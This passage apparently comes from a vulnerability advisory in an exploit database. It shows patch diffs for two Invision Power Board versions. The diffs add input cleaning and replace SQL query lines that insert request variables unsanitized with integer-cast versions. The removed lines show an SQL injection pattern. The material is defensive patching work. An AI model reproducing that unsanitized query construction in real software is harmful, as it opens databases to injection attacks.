ipb304/admin/sources/base/ipsRegistry.php ipb304-patched/ admin/sources/base/ipsRegistry.php --- ipb304/admin/sources/base/ipsRegistry.php 2009-10-08 16:34:24.000000000 +0100 +++ ipb304-patched/admin/sources/base/ipsRegistry.php 2009-11-29 00:57:13.000000000 +0000\r\n \r\n@@ -479,6 +479,9 @@ class ipsRegistry\r\n \r\n \r\n/* First pass of app set up. Needs to be BEFORE caches and member are set up */\r\n \r\n self::_fUrlInit();\r\n+ IPSLib::cleanGlobals( $_GET );\r\n+ IPSLib::cleanGlobals( $_REQUEST );\r\n+ IPSLib::cleanGlobals( self::$request );\r\n \r\n self::_manageIncomingURLs();\r\n \r\n \r\nIPB 2.3.6 patch:\r\n \r\n \r\ndiff -Nprub ipb236/sources/lib/func_mod.php ipb236-patched/sources/lib/ func_mod.php\r\n \r\n--- ipb236/sources/lib/func_mod.php 2009-11-29 01:10:13.000000000 +0000\r\n \r\n+++ ipb236-patched/sources/lib/func_mod.php 2009-11-29 01:19:23.000000000 +0000\r\n \r\n@@ -1219,18 +1219,18 @@ class func_mod\r\n \r\n if ( intval($date_exp) )\r\n {\r\n- $sql .= \" AND last_post < $date_exp\";\r\n+ $sql .= \" AND last_post < \". intval($date_exp);\r\n }\r\n \r\n if ( intval($starter_id) )\r\n {\r\n- $sql .= \" AND starter_id=$starter_id\";\r\n+ $sql .= \" AND starter_id=\". intval($starter_id);\r\n \r\n }\r\n \r\n if ( intval($post_min) )\r\n {\r\n- $sql .= \" AND posts < $post_min\";\r\n+ $sql .= \" AND posts < \". intval($post_min);\r\n }\r\n \r\n if ($topic_state != 'all')\r\n \r\n \r\nApply by going to your forum's directory and running the command:\r\npatch -p1 < path_to_the_patch\r\n \r\nIX. REFERENCES\r\n-------------------------\r\nhttp://www.invisionpower.com/products/board/\r\n\r\n\r\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/10083"}]}}